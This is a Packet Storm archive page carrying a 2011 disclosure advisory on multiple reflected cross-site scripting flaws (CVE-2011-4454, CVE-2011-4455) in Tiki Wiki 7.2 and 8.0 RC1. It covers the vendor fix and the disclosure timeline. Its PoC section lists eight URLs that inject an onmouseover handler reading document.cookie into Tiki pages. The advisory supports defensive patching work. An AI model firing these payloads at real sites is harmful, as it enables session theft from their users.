exploit the possibilities

Tiki Wiki CMS Groupware Cross Site Scripting

Tiki Wiki CMS Groupware Cross Site Scripting
Posted Nov 17, 2011
Authored by Stefan Schurtz

Tiki Wiki CMS Groupware suffers from multiple cross site scripting vulnerabilities. Versions 7.2 and 8.0 RC1 are affected.

tags | exploit, vulnerability, xss
advisories | CVE-2011-4454, CVE-2011-4455
MD5 | c4ee2779c755ae0d78b003ded62cdc14

Tiki Wiki CMS Groupware Cross Site Scripting

Change Mirror Download
Advisory:            Tiki Wiki CMS Groupware Multiple XSS vulnerabilities
Advisory ID: INFOSERVE-ADV2011-01
Author: Stefan Schurtz
Contact: security@infoserve.de
Affected Software: Successfully tested on Tiki 7.2 & 8.0 RC1
Vendor URL: http://info.tiki.org/
Vendor Status: fixed for Tiki 7 (New Tiki 6 LTS release in progress)
CVE-ID: CVE-2011-4454, CVE-2011-4455

==========================
Vulnerability Description
==========================

All versions of Tiki 6 and Tiki 7 and version Tiki 8.0RC1 are prone to multiple XSS vulnerabilities

==================
PoC-Exploit
==================

8.0RC1

http://<target>/tiki-8.0.RC1/tiki-remind_password.php/" onmouseover="alert(document.cookie)"
http://<target>/tiki-8.0.RC1/tiki-index.php/" onmouseover="alert(document.cookie)"
http://<target>/tiki-8.0.RC1/tiki-login_scr.php/" onmouseover="alert(document.cookie)"
http://<target>/tiki-8.0.RC1/tiki-index/" onmouseover="alert(document.cookie)"

7.2

http://<target>/tiki-7.2/tiki-admin_system.php/" onmouseover="alert(document.cookie)"
http://<target>/tiki-7.2/tiki-pagehistory.php/" onmouseover="alert(document.cookie)"
http://<target>/tiki-7.2/tiki-removepage.php/" onmouseover="alert(document.cookie)"
http://<target>/tiki-7.2/tiki-rename_page.php/" onmouseover="alert(document.cookie)"

=========
Solution
=========

Upgrade to Tiki 8.1 (End-of-Life for Tiki 7.x)

====================
Disclosure Timeline
====================

02-Nov-2011 - informed Security Team (security@tikiwiki.org)
03-Nov-2011 - feedback from vendor
11-Nov-2011 - release of version 8.1 (End-of-Life for Tiki 7.x)

========
Credits
========

Vulnerabilities found and advisory written by the INFOSERVE Security Team

===========
References
===========

http://info.tiki.org/
http://dev.tiki.org/tiki-view_tracker_item.php?itemId=4027#content1
http://info.tiki.org/article182-Tiki-8-1-Now-Available-End-of-Life-for-Tiki-7-x
http://secunia.com/advisories/46740
Login or Register to add favorites

File Archive:

May 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    1 Files
  • 2
    May 2nd
    4 Files
  • 3
    May 3rd
    27 Files
  • 4
    May 4th
    17 Files
  • 5
    May 5th
    3 Files
  • 6
    May 6th
    32 Files
  • 7
    May 7th
    11 Files
  • 8
    May 8th
    0 Files
  • 9
    May 9th
    0 Files
  • 10
    May 10th
    0 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    0 Files
  • 14
    May 14th
    0 Files
  • 15
    May 15th
    0 Files
  • 16
    May 16th
    0 Files
  • 17
    May 17th
    0 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    0 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close